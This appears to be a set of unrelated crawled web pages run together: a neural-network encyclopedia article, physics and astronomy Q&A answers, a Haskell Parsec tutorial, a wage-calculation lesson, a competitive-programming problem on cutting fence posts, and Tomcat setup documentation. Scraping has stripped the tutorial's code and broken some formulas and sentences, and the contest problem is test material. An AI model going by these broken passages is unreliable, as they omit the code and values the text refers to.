In the artificial intelligence field, artificial neural networks have been applied successfully to speech recognition, image analysis and adaptive control, in order to construct software agents (in computer and video games) or autonomous robots. Most of the currently employed artificial neural networks for artificial intelligence are based on statistical estimation, optimization and control theory.
The cognitive modelling field is the physical or mathematical modeling of the behaviour of neural systems; ranging from the individual neural level (e.g. modelling the spike response curves of neurons to a stimulus), through the neural cluster level (e.g. modelling the release and effects of dopamine in the basal ganglia) to the complete organism (e.g. behavioural modelling of the organism's response to stimuli).
The brain, neural networks and computers
Neural networks, as used in artificial intelligence, have traditionally been viewed as simplified models of neural processing in the brain, even though the relation between this model and brain biological architecture is debated. To answer this question, David Marr has proposed various levels of analysis which provide us with a plausible answer for the role of neural networks in the understanding of human cognitive functioning.
A subject of current research in theoretical neuroscience is the question surrounding the degree of complexity and the properties that individual neural elements should have to reproduce something resembling animal intelligence.
Historically, computers evolved from the von Neumann architecture, which is based on sequential processing and execution of explicit instructions. On the other hand, the origins of neural networks are based on efforts to model information processing in biological systems, which may rely largely on parallel processing as well as implicit instructions based on recognition of patterns of 'sensory' input from external sources. In other words, rather than sequential processing and execution, at their very heart, neural networks are complex statistical processors.
Neural networks and artificial intelligence
An artificial neural network (ANN), also called a simulated neural network (SNN) or commonly just neural network (NN) is an interconnected group of artificial neurons that uses a mathematical or computational model for information processing based on a connectionist approach to computation. In most cases an ANN is an adaptive system that changes its structure based on external or internal information that flows through the network.
In more practical terms neural networks are non-linear statistical data modeling or decision making tools. They can be used to model complex relationships between inputs and outputs or to find patterns in data.
An artificial neural network involves a network of simple processing elements (artificial neurons) which can exhibit complex global behaviour, determined by the connections between the processing elements and element parameters. One classical type of artificial neural network is the Hopfield net.
In a neural network model simple nodes, which can be called variously "neurons", "neurodes", "Processing Elements" (PE) or "units", are connected together to form a network of nodes — hence the term "neural network". While a neural network does not have to be adaptive per se, its practical use comes with algorithms designed to alter the strength (weights) of the connections in the network to produce a desired signal flow.
In modern software implementations of artificial neural networks the approach inspired by biology has more or less been abandoned for a more practical approach based on statistics and signal processing. In some of these systems neural networks, or parts of neural networks (such as artificial neurons) are used as components in larger systems that combine both adaptive and non-adaptive elements.
The utility of artificial neural network models lies in the fact that they can be used to infer a function from observations. This is particularly useful in applications where the complexity of the data or task makes the design of such a function by hand impractical.
Real life applications
The tasks to which artificial neural networks are applied tend to fall within the following broad categories:
- Function approximation, or regression analysis, including time series prediction and modelling.
- Classification, including pattern and sequence recognition, novelty detection and sequential decision making.
- Data processing, including filtering, clustering, blind signal separation and compression.
Application areas include system identification and control (vehicle control, process control), game-playing and decision making (backgammon, chess, racing), pattern recognition (radar systems, face identification, object recognition and more), sequence recognition (gesture, speech, handwritten text recognition), medical diagnosis, financial applications, data mining (or knowledge discovery in databases, "KDD"), visualisation and e-mail spam filtering.
Neural network software
Main article: Neural network software
Neural network software is used to simulate, research, develop and apply artificial neural networks, biological neural networks and in some cases a wider array of adaptive systems.
There are three major learning paradigms, each corresponding to a particular abstract learning task. These are supervised learning, unsupervised learning and reinforcement learning. Usually any given type of network architecture can be employed in any of those tasks.
In supervised learning, we are given a set of example pairs <math> (x, y), x \in X, y \in Y</math> and the aim is to find a function <math>f</math> in the allowed class of functions that matches the examples. In other words, we wish to infer how the mapping implied by the data and the cost function is related to the mismatch between our mapping and the data.
In unsupervised learning we are given some data <math>x</math>, and a cost function to be minimized which can be any function of <math>x</math> and the network's output, <math>f</math>. The cost function is determined by the task formulation. Most applications fall within the domain of estimation problems such as statistical modeling, compression, filtering, blind source separation and clustering.
In reinforcement learning, data <math>x</math> is usually not given, but generated by an agent's interactions with the environment. At each point in time <math>t</math>, the agent performs an action <math>y_t</math> and the environment generates an observation <math>x_t</math> and an instantaneous cost <math>c_t</math>, according to some (usually unknown) dynamics. The aim is to discover a policy for selecting actions that minimises some measure of a long-term cost, i.e. the expected cumulative cost. The environment's dynamics and the long-term cost for each policy are usually unknown, but can be estimated. ANNs are frequently used in reinforcement learning as part of the overall algorithm. Tasks that fall within the paradigm of reinforcement learning are control problems, games and other sequential decision making tasks.
There are many algorithms for training neural networks; most of them can be viewed as a straightforward application of optimization theory and statistical estimation.
Evolutionary computation methods, simulated annealing, expectation maximization and non-parametric methods are among other commonly used methods for training neural networks. See also machine learning.
Recent developments in this field also saw the use of particle swarm optimization and other swarm intelligence techniques used in the training of neural networks.
Neural networks and neuroscience
Theoretical and computational neuroscience is the field concerned with the theoretical analysis and computational modeling of biological neural systems. Since neural systems are intimately related to cognitive processes and behaviour, the field is closely related to cognitive and behavioural modeling.
The aim of the field is to create models of biological neural systems in order to understand how biological systems work. To gain this understanding, neuroscientists strive to make a link between observed biological processes (data), biologically plausible mechanisms for neural processing and learning (biological neural network models) and theory (statistical learning theory and information theory).
Types of models
Many models are used in the field, each defined at a different level of abstraction and trying to model different aspects of neural systems. They range from models of the short-term behaviour of individual neurons, through models of how the dynamics of neural circuitry arise from interactions between individual neurons, to models of how behaviour can arise from abstract neural modules that represent complete subsystems. These include models of the long-term and short-term plasticity of neural systems and its relation to learning and memory, from the individual neuron to the system level.
While initially research had been concerned mostly with the electrical characteristics of neurons, a particularly important part of the investigation in recent years has been the exploration of the role of neuromodulators such as dopamine, acetylcholine, and serotonin on behaviour and learning.
- Peter Dayan, L.F. Abbott. Theoretical Neuroscience. MIT Press.
- Wulfram Gerstner, Werner Kistler. Spiking Neuron Models:Single Neurons, Populations, Plasticity. Cambridge University Press.
History of the neural network analogy
The concept of neural networks started in the late-1800s as an effort to describe how the human mind performed. These ideas started being applied to computational models with the Perceptron.
In early 1950s Friedrich Hayek was one of the first to posit the idea of spontaneous order in the brain arising out of decentralized networks of simple units (neurons). In the late 1940s, Donald Hebb made one of the first hypotheses for a mechanism of neural plasticity (i.e. learning), Hebbian learning. Hebbian learning is considered to be a 'typical' unsupervised learning rule and it (and variants of it) was an early model for long term potentiation.
The Perceptron is essentially a linear classifier for classifying data <math> x \in R^n</math> specified by parameters <math>w \in R^n, b \in R</math> and an output function <math>f = w'x + b</math>. Its parameters are adapted with an ad-hoc rule similar to stochastic steepest gradient descent. Because the inner product is linear operator in the input space, the Perceptron can only perfectly classify a set of data for which different classes are linearly separable in the input space, while it often fails completely for non-separable data. While the development of the algorithm initially generated some enthusiasm, partly because of its apparent relation to biological mechanisms, the later discovery of this inadequacy caused such models to be abandoned until the introduction of non-linear models into the field.
The Cognitron (1975) was an early multilayered neural network with a training algorithm. The actual structure of the network and the methods used to set the interconnection weights change from one neural strategy to another, each with its advantages and disadvantages. Networks can propagate information in one direction only, or they can bounce back and forth until self-activation at a node occurs and the network settles on a final state. The ability for bi-directional flow of inputs between neurons/nodes was produced with the Hopfield's network (1982), and specialization of these node layers for specific purposes was introduced through the first hybrid network.
The parallel distributed processing of the mid-1980s became popular under the name connectionism.
The rediscovery of the backpropagation algorithm was probably the main reason behind the repopularisation of neural networks after the publication of "Learning Internal Representations by Error Propagation" in 1986 (Though backpropagation itself dates from 1974). The original network utilised multiple layers of weight-sum units of the type <math>f = g(w'x + b)</math>, where <math>g</math> was a sigmoid function or logistic function such as used in logistic regression. Training was done by a form of stochastic steepest gradient descent. The employment of the chain rule of differentiation in deriving the appropriate parameter updates results in an algorithm that seems to 'backpropagate errors', hence the nomenclature. However it is essentially a form of gradient descent. Determining the optimal parameters in a model of this type is not trivial, and steepest gradient descent methods cannot be relied upon to give the solution without a good starting point. In recent times, networks with the same architecture as the backpropagation network are referred to as Multi-Layer Perceptrons. This name does not impose any limitations on the type of algorithm used for learning.
The backpropagation network generated much enthusiasm at the time and there was much controversy about whether such learning could be implemented in the brain or not, partly because a mechanism for reverse signalling was not obvious at the time, but most importantly because there was no plausible source for the 'teaching' or 'target' signal.
A. K. Dewdney, a former Scientific American columnist, wrote in 1997, “Although neural nets do solve a few toy problems, their powers of computation are so limited that I am surprised anyone takes them seriously as a general problem-solving tool.” (Dewdney, p.82)
Arguments against Dewdney's position are that neural nets have been successfully used to solve many complex and diverse tasks, ranging from autonomously flying aircraft to detecting credit card fraud .
Technology writer Roger Bridgman commented on Dewdney's statements about neural nets: "Neural networks, for instance, are in the dock not only because they have been hyped to high heaven, (what has not?) but also because you could create a successful net without understanding how it worked: the bunch of numbers that captures its behaviour would in all probability be "an opaque, unreadable table...valueless as a scientific resource".
In spite of his emphatic declaration that science is not technology, Dewdney seems here to pillory neural nets as bad science when most of those devising them are just trying to be good engineers. An unreadable table that a useful machine could read would still be well worth having."
- Artificial neural network
- Biologically-inspired computing
- Neural network software
- Predictive analytics
- Radial basis function network
- Support vector machine
- Tensor product network
- 20Q is a neural network implementation of the 20 questions game
- Template:Cite paper
- Template:Cite paper
- Template:Cite paper
- Abdi, H., Valentin, D., Edelman, B.E. (1999). Neural Networks. Thousand Oaks: Sage.
- Anderson, James A. (1995). An Introduction to Neural Networks. ISBN 0-262-01144-1. Text " publisher-MIT Press " ignored (help)
- Arbib, Michael A. (Ed.) (1995). The Handbook of Brain Theory and Neural Networks.
- Alspector, U.S. Patent 4,874,963 "Neuromorphic learning networks". October 17, 1989.
- Agree, Philip E.; et al. (1997). Comparative Cognitive Robotics: Computation and Human Experience. Cambridge University Press. ISBN 0-521-38603-9. , p. 80
- Bar-Yam, Yaneer (2003). Dynamics of Complex Systems, Chapter 2. External link in
- Bar-Yam, Yaneer (2003). Dynamics of Complex Systems, Chapter 3. External link in
- Bar-Yam, Yaneer (2005). Making Things Work. External link in
|title=(help) See chapter 3.
- Bertsekas, Dimitri P. (1999). Nonlinear Programming.
- Bertsekas, Dimitri P. & Tsitsiklis, John N. (1996). Neuro-dynamic Programming.
- Boyd, Stephen & Vandenberghe, Lieven (2004). Convex Optimization. External link in
- Dewdney, A. K. (1997). Yes, We Have No Neutrons: An Eye-Opening Tour through the Twists and Turns of Bad Science. Wiley, 192 pp. See chapter 5.
- Fukushima, K. (1975). "Cognitron: A Self-Organizing Multilayered Neural Network". Biological Cybernetics. 20: 121&ndash, 136.
- Frank, Michael J. (2005). "Dynamic Dopamine Modulation in the Basal Ganglia: A Neurocomputational Account of Cognitive Deficits in Medicated and Non-medicated Parkinsonism". Journal of Cognitive Neuroscience. 17: 51&ndash, 72.
- Gardner, E.J., & Derrida, B. (1988). "Optimal storage properties of neural network models". Journal of Physics A. 21: 271&ndash, 284.
- Krauth, W., & Mezard, M. (1989). "Storage capacity of memory with binary couplings". Journal de Physique. 50: 3057&ndash, 3066.
- Maass, W., & Markram, H. (2002). "On the computational power of recurrent circuits of spiking neurons". Journal of Computer and System Sciences. 69(4): 593&ndash, 616. External link in
- MacKay, David (2003). Information Theory, Inference, and Learning Algorithms. External link in
- Mandic, D. & Chambers, J. (2001). Recurrent Neural Networks for Prediction: Architectures, Learning algorithms and Stability. Wiley.
- Minsky, M. & Papert, S. (1969). An Introduction to Computational Geometry. MIT Press.
- Muller, P. & Insua, D.R. (1995). "Issues in Bayesian Analysis of Neural Network Models". Neural Computation. 10: 571&ndash, 592.
- Reilly, D.L., Cooper, L.N. & Elbaum, C. (1982). "A Neural Model for Category Learning". Biological Cybernetics. 45: 35&ndash, 41.
- Rosenblatt, F. (1962). Principles of Neurodynamics. Spartan Books.
- Sutton, Richard S. & Barto, Andrew G. (1998). Reinforcement Learning : An introduction. External link in
- Template:Cite paper
- Wilkes, A.L. & Wade, N.J. (1997). "Bain on Neural Networks". Brain and Cognition. 33: 295&ndash, 305.
- Wasserman, P.D. (1989). Neural computing theory and practice. Van Nostrand Reinhold.
- Jeffrey T. Spooner, Manfredi Maggiore, Raul Ord onez, and Kevin M. Passino, Stable Adaptive Control and Estimation for Nonlinear Systems: Neural and Fuzzy Approximator Techniques, John Wiley and Sons, NY, 2002.
- ↑ Arbib, p.666 | <urn:uuid:d151d149-c696-44fe-85a6-205d081e59a1> | CC-MAIN-2023-14 | https://www.wikidoc.org/index.php/Neural_network | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948708.2/warc/CC-MAIN-20230327220742-20230328010742-00409.warc.gz | en | 0.895121 | 4,361 | 3.46875 | 3 |
Yes it is because of that:
1 - The wind must pick up speed as long its angle is less than 90° to the pressure gradient. This is because it has a net force in its direction of motion, and $F=ma$, so it has acceleration towards the low pressure. Whereas Coriolis "force" being always 90° from movement means it cannot accelerate/affect the magnitude, only change the direction.
2 - And Coriolis is $f\times v$, meaning Coriolis Force indeed increases as velocity increases.
As the process continues, the change in direction means less and less of the PGF is a component that changes the magnitude of velocity, and more and more of it is normal to motion... and so opposing the Coriolis.
If they didn't cancel each other out when the parcel reached 90° to the PGF, then the parcel would still have a directional acceleration... meaning it then again becomes not 90° to the PGF.
If PGF were stronger/it is less than 90° to PGF, it would further accelerate in velocity, and so thus further increase Coriolis... and be directed back to perpendicular.
If Coriolis were somehow stronger/it somehow got beyond 90°, the PGF would then start to have a component that decelerates the velocity. Which would decrease the Coriolis counteracting it, and so pull it back (left in the NH) towards perpendicular.
So the situation is entirely restorative/stable. It can only be at balance when they cancel each other out, and the motion is at that 90° angle (unless there are additional forces). When it somehow isn't in that balanced situation, the forces work to accelerate/push it back towards that situation.
With a "sudden" low pressure, nearby parcels would not have the time/distance to undergo this process and accelerate/change direction enough before reaching the low. But typically atmospheric pressure changes are gradual changes, so basically the change in motion are so gradual that the motion at any time is essentially geostrophic at any moment.
Rapid pressure changes can and do still lead to local ageostrphic motion, where the change is of such speed and magnitude that the Coriolis Force hasn't responded yet and so there is a more meaningful component of motion out of balance (and so the motion is more non-perpendicular to the PGF).
And other forces... in particular friction at lower levels of the atmosphere... do alter the balance. Friction continually decelerating motion leads to a result where the path is consistently a bit less than 90°, towards the low pressure, which leads (apart from other factors) to filling of the low pressure over time. Particularly strong persistent low pressure can also result in a flow nearby that must turn so rapidly that there is a significant centrifugal "force" as well... this extra force isn't degenerative like friction is, but leads to a different balance instead, the gradient wind balance, with a somewhat lower velocity compared to geostrophic balance. | <urn:uuid:a076d5a4-05da-41f6-a7d6-cffdac5b3050> | CC-MAIN-2023-14 | https://earthscience.stackexchange.com/questions/24306/in-geostrophic-wind-what-is-the-mechanism-behind-the-tendency-of-the-coriolis-e | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944996.49/warc/CC-MAIN-20230323034459-20230323064459-00210.warc.gz | en | 0.950951 | 630 | 3.5625 | 4 |
kuniga.me > NP-Incompleteness > An Introduction to the Parsec Library
21 Jan 2014
The process of compiling or interpreting programs requires, as one of its steps, parsing the source code and structuring them. More specifically, we have a step to convert a string into a set of tokens, called lexical analysis, which is carried out by a lexer or tokenizer.
After that, we structure those tokens in a such a way that encodes meaning of these tokens, such as abstract syntax trees (AST). This step is called parsing and is out by a parser.
The parsec library
Parse combinators are high-order functions that combine smaller combinators (parsers) to build more complex ones. This resembles the idea of context free grammars (CFG), which we talked about in a previous post, where we have productions of form\[S \rightarrow A \mid B\]
Here, \(S\) can be formed by either from \(A\) or \(B\), which in turn, can be other productions or terminals.
The parsec library is an implementation of a parser combinator in Haskell. We talked about combinators in Haskell previously (in portuguese).
Parsec vs. Bison/Yacc/Antlr
All Bison, Yacc and Antlr are not actual parsers, but rather parsers generators. They take a grammar file and generate parsers for the languages that can be described by those grammars.
Parsec, on the other hand, is a parser that you write yourself.
In this post we’ll go through several basic concepts of the parsec library, using as the main reference, the book Real World Haskell, Chapter 16.
The source code for all the examples to follow can be found on the blog’s github repository.
The basic idea of a parser is that it takes an input (for example, a string), it consumes the characters of this string until it’s done with what it’s supposed to parse and then pass the remaining (unparsed) string along, which might be used as input to subsequent parsers.
One of the simples parsers is the one that only consumes a single specific character. There’s a parser named
Data.Char library, so let’s write one that parses the letter
To test our parser with an input, we use the
parse function form
This function takes as input a parser, a source name and the actual input. The source name parameter is not important for us now, so we can pass the empty string. Let’s write a simple wrapper to avoid boilerplate:
We can now test our parser with same sample inputs:
It extracts the first character of the input string if it’s the
'a' character, otherwise it throws an error. If we want to match any char, there’s also the function
anyChar. Running it with the same examples:
Note that it doesn’t fail for strings starting with
'b'. So far our parsers only match one character, so for example, the string
"ab", it only returns the first character.
We can use a parser for the string too. There’s the
string combinator but let’s develop our own and show how we can combine combinators to form new ones. There’s the
many combinator that applies the combinator passed as argument until it fails.
Thus, we can write a string parser as
Now let’s try it with the string
More useful than matching all characters is matching all except some, so we know when to stop parsing. For that, we can use
noneOf instead of
anyChar. It takes a list of characters as parameter and matches any character that is not on that list.
Let’s now write a
wordParser, which keeps parsing all characters until it finds an whitespace:
Let’s try it on the most classical string example:
Note that our parsers are throwing away all the unparsed strings. How can we parse the remaining, unparsed string?
We’ve talked about Functors and Monads before, but not about Applicatives functors.
Intuitively, they are a structure in between Functors and Monads, that is, they’re more complex and general than Functors but less than Monads. We can also make the analogy of wrappers that we did for monads.
Originally, the Parsec library was written with Monads in mind, but Applicative functors were introduced after that and using them to write parsers usually leads to more clear syntax. So, in this post, we’ll use the applicative flavor to write our parsers.
Here, we’ll only provide an overview of some of the main applicative operators. For further details, the book Learn You a Haskell for Great Good has a nice introduction to Applicatives.
Operators Cheat Sheet. We can use the
Maybe typeclass to illustrate the main applicative operators, since it implements an applicative functor.
(<*>) Unwrap the contents of both sides, combine them and wrap again
(*>) Unwrap the contents of both sides, but discard the result on the left
(<*) Unwrap the contents of both sides, but discard the result on the right.
(<$>) Unwrap the contents of the right, combine the left and right arguments and return
(<$) Unwrap the contents of the right, but only wrap the one to the left
This analogy of wrappers applied to parsers is not as natural though. In this case, we can think of unwrapping as executing the parser, by consuming the input and wrapping the result as getting the parsed token. The unparsed string is always carried over from parser to parser.
Hopefully with the next examples this will become clearer:
Parsing the second word
If we are to get the token from the second parser instead of the first, we need to execute both parsers but ignore the result of the first. Thus, we can use the operator
(*>) to obtain something like
This won’t quite work because the first parser doesn’t consume the whitespace, so the second parser will stop before consuming anything. We can fix that by consuming the whitespace:
So let’s write:
and now we can test:
Parsing two words
We can also return both tokens if we use the operator
(<*>) and then combine them into a list:
Parsing multiple words
Generalizing, we can parse multiple words with the aid of the
We could actually write this using the
sepBy1 parser, which parses a list of tokens separated by a separator and requires the list to have at least one element:
Simple CSV parser
With what we’ve seen so far, we can write a very basic CSV parser in 4 lines of code.
Note that it doesn't handle some corner cases like escaped commas within cells. For a full example, refer to either or .
Recall that in Context Free Grammars, we can have production rules of the type:\[S \rightarrow A \mid B\]
which means that S can be generated either from \(A\) or \(B\). In Parsec, we can express this option using the
(<|>) operator. Let’s write a simple parser that parses either the
Testing on some inputs:
Let’s write another example with different animal names:
and try again with the input
The parser failed because the strings have common prefix. It started matching the camel parser, but it also consumed the
"ca" characters and then it failed to match the cat parser.
The try combinator
To avoid this, problem, there’s the
try combinator, which will make a parser to not consume its input if it fails to match:
which works as expected:
We can see that it’s straightforward to convert a standard context free grammar into a haskell program using parsec.
So far we our parsers have only returned strings and list of strings. We can use data types to structure our parsed data in a way that is easier to evaluate later.
For our example, we’ll build a very simple parser for expressions that only contain
- binary operators, terminals are all integers and all binaries are surrounded by parenthesis so we don’t have to handle precedence. Examples of valid expressions are
"1+2" is invalid (no parenthesis).
The first thing we want to do is to define our data types. Our number type,
TNumber, is just an alias to
Int. Our operator type,
TOperator can be one of addition (
TAdd) or subtraction (
TSubtract). Finally, the expression is either binary (
TNode) or a number (
From what we’ve seen so far, it’s not very complicated to write parsers for
For the expression we have two choices. Either we parse another expression enclosed in parenthesis or we parse a terminal. In the first case, we call the
binaryExpressionParser which looks for the left expression, the operator and then the right expression.
And that’s it! We can now run an example with a valid expression:
The advantage of having this AST is that it’s now very simple to evaluate:
And the final test:
It works! We implemented a simple parser and interpreter for a very limited arithmetic expression. There are much better tools to do expression parsing (see * for a tutorial), but it’s out of the scope of this post.
We’ve learned the basics of the Parsec library and built some non-trivial parsers gluing together basic parsers using combinators. We even started scratching the parsing of programming languages by writing a parser for arithmetic expressions.
The Parsec applications presented in the Real World Haskell book are great. I felt that the content was a bit hard to follow, but writing helped me get a better understanding of the subject. | <urn:uuid:7d1f113b-91a4-4964-a4bb-e15f96ec778e> | CC-MAIN-2023-14 | https://www.kuniga.me/blog/2014/01/21/an-introduction-to-the-parsec-library.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944996.49/warc/CC-MAIN-20230323034459-20230323064459-00210.warc.gz | en | 0.864466 | 2,236 | 3.109375 | 3 |
I know they will be orbiting about a common center of mass, i.e. the
barycenter. But, do the velocities have to be equal in magnitude and
opposite in direction (normal to R when R is their distance from each
other) for the orbit to be stable?
The orbital velocities do not have to be and in general are not equal in magnitude. What is equal is the angular velocity, that is the angular rate (e.g., in $rad/sec$) that two bodies will be orbiting their common barycenter. The orbital radius, $r$, orbital velocity, $v$, and angular velocity, $\omega$, are related by the equation
$$\omega = v/r$$
Note that these are all scalar quantities and $v$ can be thought of as the component of the velocity vector which is perpendicular to $r$. Since conservation of angular momentum implies that $\omega$ remain constant for each body, individually, then we know that $v/r$ must also be constant which implies that bodies which orbit farther away from the barycenter must necessarily be orbiting faster and vice versa.
Now of course that simplifying explanation works for two bodies. Once you throw in more than two bodies, things become more complicated and the barycenter can move around, causing more complex motions.
I think, if the velocity of one mass were to vary with respect to the
other it would create a moving barycenter in which the two masses
would collide or throw on another out of the orbit
This is a subtly different question. If one of the two masses had a varying orbital velocity, that would imply it was gaining or losing energy by some mechanism. This can occur through things like tidal interactions as it does for our Earth and Moon. As stated above, the angular velocity must remain constant which implies that the body whose velocity is changing must also migrate towards or away from the barycenter, potentially resulting in a collision or escape. Since the Moon's orbital velocity is being sped up through tidal interactions, it is moving farther away as a result. Another example might be two black holes emitting gravitational waves as they orbit which propagates away energy and thus they orbital velocities, causing them to get closer together until they collide. | <urn:uuid:2ce8160e-9c05-499a-a4d8-663d3cc3d254> | CC-MAIN-2023-14 | https://astronomy.stackexchange.com/questions/14418/two-body-orbit-of-equal-masses/46982 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945144.17/warc/CC-MAIN-20230323100829-20230323130829-00610.warc.gz | en | 0.954222 | 472 | 3.359375 | 3 |
A wage is an amount paid to an employee at a certain rate. It may be calculated as a fixed task based amount, or at an hourly rate, or based on the quantity of work done (e.g. piecemeal work). So if you are paid per hour, your wage will increase the more hours you work.
In contrast, a salary is a fixed income that is based on a fixed number of working hours. People normally sign a contract with an agreed salary amount before they start working with a company. An employee may receive a weekly, fortnightly or monthly salary. The employee will receive the same amount of income each time period, regardless of whether they work more or less hours, as it is thought this will be averaged out.
A salary is normally written as an annual amount. However, it can be helpful to calculate how much money you'll receive each week, to help you set a budget for your spending. Similarly, you may want to work out how much money you will earn in a year based on the amount you get paid fortnightly. So let's look at some examples of how to solve questions involving salaries and wages.
Beth worked for $281$281 days in the year, with an average of $7$7 hours a day. For $62%$62% of those hours, she was paid $\$15$$15 per hour, and for the rest she was paid $\$25$$25 per hour.
A) For how many hours was she paid $\$15$$15 per hour? Give your answer to $1$1 decimal place.
Think: How many hours does she work in a year?
$281\times7=1967$281×7=1967 hours that she works in a year
B) For how many hours was she paid $\$25$$25 per hour? Give your answer to $1$1 decimal place.
Think: She was earning $\$15$$15 for 1219.5 hours, and $\$25$$25 for the rest of the year.
Do: $1967-1219.5=747.5$1967−1219.5=747.5 hours
C) What was her total income for the year (to the nearest cent)?
D) What was her average weekly income for the year (to the nearest cent)?
Think: There are $52$52 weeks in a year.
Han earned $\$53030$$53030 in one year, and worked an average of $25$25 hours per week.
What hourly wage did he earn, to the nearest cent?
How much would his annual salary have to increase by for his equivalent hourly wage to increase by $\$4$$4?
Han's annual salary is $\$32630$$32630. Calculate his fortnightly pay after receiving a $5$5% pay rise. Write your answer correct to two decimal places. | <urn:uuid:70182955-bbb7-4840-844d-ea44ca901a12> | CC-MAIN-2023-14 | https://mathspace.co/textbooks/syllabuses/Syllabus-98/topics/Topic-1473/subtopics/Subtopic-17363/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945288.47/warc/CC-MAIN-20230324180032-20230324210032-00610.warc.gz | en | 0.970665 | 760 | 3.6875 | 4 |
Donald is a fence builder. He wants to build a fence that is $N - 1$ meters long. He needs a fence post every meter along the fence, which means he needs $N$ fence posts. Donald has $K$ poles of varying lengths that he wants to use as fence posts. The fence posts must have the same lengths, and be as long as possible. Also, the parts of the poles that are not used for the posts must not be longer than the ones used for the posts. Donald can cut the poles as many times as he wants, and at any position he wants. However, cutting a pole takes time, so he wants to make as few cuts as possible while achieving his other goals.
How many cuts does Donald have to make to get the fence posts for his fence?
The first line has two space-separated integers, $K$ and $N$. The second line consists of $K$ space-separated integers $p_1$, $p_2$, …, $p_ K$, where $p_ i$ represents the length of the $i$th pole.
Output the minimum number of cuts needed to build the fence.
$1 \leq K \leq N \leq 10\, 000$
$1 \leq p_ i \leq 10\, 000$
|Sample Input 1||Sample Output 1|
1 2 3
|Sample Input 2||Sample Output 2|
2 5 4 2 | <urn:uuid:75a879a3-8bad-4a24-a42e-b837589b0107> | CC-MAIN-2023-14 | https://ru.kattis.com/courses/T-414-AFLV/aflv21/assignments/hibhiv/problems/fence2 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943625.81/warc/CC-MAIN-20230321033306-20230321063306-00210.warc.gz | en | 0.960821 | 346 | 2.546875 | 3 |
Table of Contents
For administrators and web developers alike, there are some important bits of information you should familiarize yourself with before starting out. This document serves as a brief introduction to some of the concepts and terminology behind the Tomcat container. As well, where to go when you need help.
In the course of reading these documents, you will run across a number of terms; some specific to Tomcat, and others defined by the Servlet and JSP specifications.
- Context - In a nutshell, a Context is a web application.
That is it. If you find any more terms we need to add to this section, please do let us know.
Directories and Files
These are some of the key tomcat directories:
- /bin - Startup, shutdown, and other scripts. The
*.shfiles (for Unix systems) are functional duplicates of the
*.batfiles (for Windows systems). Since the Win32 command-line lacks certain functionality, there are some additional files in here.
- /conf - Configuration files and related DTDs. The most important file in here is server.xml. It is the main configuration file for the container.
- /logs - Log files are here by default.
- /webapps - This is where your webapps go.
CATALINA_HOME and CATALINA_BASE
Throughout the documentation, there are references to the two following properties:
CATALINA_HOME: Represents the root of your Tomcat
installation, for example
CATALINA_BASE: Represents the root of a runtime
configuration of a specific Tomcat instance. If you want to have
multiple Tomcat instances on one machine, use the
If you set the properties to different locations, the CATALINA_HOME location
contains static sources, such as
.jar files, or binary files.
The CATALINA_BASE location contains configuration files, log files, deployed
applications, and other runtime requirements.
Why Use CATALINA_BASE
By default, CATALINA_HOME and CATALINA_BASE point to the same directory. Set CATALINA_BASE manually when you require running multiple Tomcat instances on one machine. Doing so provides the following benefits:
Easier management of upgrading to a newer version of Tomcat. Because all
instances with single CATALINA_HOME location share one set of
.jarfiles and binary files, you can easily upgrade the files to newer version and have the change propagated to all Tomcat instances using the same CATALIA_HOME directory.
Avoiding duplication of the same static
The possibility to share certain settings, for example the
setenvshell or bat script file (depending on your operating system).
Contents of CATALINA_BASE
Before you start using CATALINA_BASE, first consider and create the directory tree used by CATALINA_BASE. Note that if you do not create all the recommended directories, Tomcat creates the directories automatically. If it fails to create the necessary directory, for example due to permission issues, Tomcat will either fail to start, or may not function correctly.
Consider the following list of directories:
bindirectory with the
Order of lookup: CATALINA_BASE is checked first; fallback is provided to CATALINA_HOME.
libdirectory with further resources to be added on classpath.
Recommended: Yes, if your application depends on external libraries.
Order of lookup: CATALINA_BASE is checked first; CATALINA_HOME is loaded second.
logsdirectory for instance-specific log files.
webappsdirectory for automatically loaded web applications.
Recommended: Yes, if you want to deploy applications.
Order of lookup: CATALINA_BASE only.
workdirectory that contains temporary working directories for the deployed web applications.
tempdirectory used by the JVM for temporary files.
We recommend you not to change the
However, in case you require your own logging implementation, you can
tomcat-juli.jar file in a CATALINA_BASE location
for the specific Tomcat instance.
We also recommend you copy all configuration files from the
CATALINA_HOME/conf directory into the
CATALINA_BASE/conf/ directory. In case a configuration file
is missing in CATALINA_BASE, there is no fallback to CATALINA_HOME.
Consequently, this may cause failure.
At minimum, CATALINA_BASE must contain:
confdirectory. Otherwise, Tomcat fails to start, or fails to function properly.
For advanced configuration information, see the RUNNING.txt file.
How to Use CATALINA_BASE
The CATALINA_BASE property is an environment variable. You can set it before you execute the Tomcat start script, for example:
- On Unix:
CATALINA_BASE=/tmp/tomcat_base1 bin/catalina.sh start
- On Windows:
CATALINA_BASE=C:\tomcat_base1 bin/catalina.bat start
This section will acquaint you with the basic information used during the configuration of the container.
All of the information in the configuration files is read at startup, meaning that any change to the files necessitates a restart of the container.
Where to Go for Help
While we've done our best to ensure that these documents are clearly written and easy to understand, we may have missed something. Provided below are various web sites and mailing lists in case you get stuck.
Keep in mind that some of the issues and solutions vary between the major versions of Tomcat. As you search around the web, there will be some documentation that is not relevant to Tomcat 8, but only to earlier versions.
- Current document - most documents will list potential hangups. Be sure to fully read the relevant documentation as it will save you much time and effort. There's nothing like scouring the web only to find out that the answer was right in front of you all along!
- Tomcat FAQ
- Tomcat WIKI
- Tomcat FAQ at jGuru
- Tomcat mailing list archives - numerous sites archive the Tomcat mailing lists. Since the links change over time, clicking here will search Google.
- The TOMCAT-USER mailing list, which you can subscribe to here. If you don't get a reply, then there's a good chance that your question was probably answered in the list archives or one of the FAQs. Although questions about web application development in general are sometimes asked and answered, please focus your questions on Tomcat-specific issues.
- The TOMCAT-DEV mailing list, which you can subscribe to here. This list is reserved for discussions about the development of Tomcat itself. Questions about Tomcat configuration, and the problems you run into while developing and running applications, will normally be more appropriate on the TOMCAT-USER list instead.
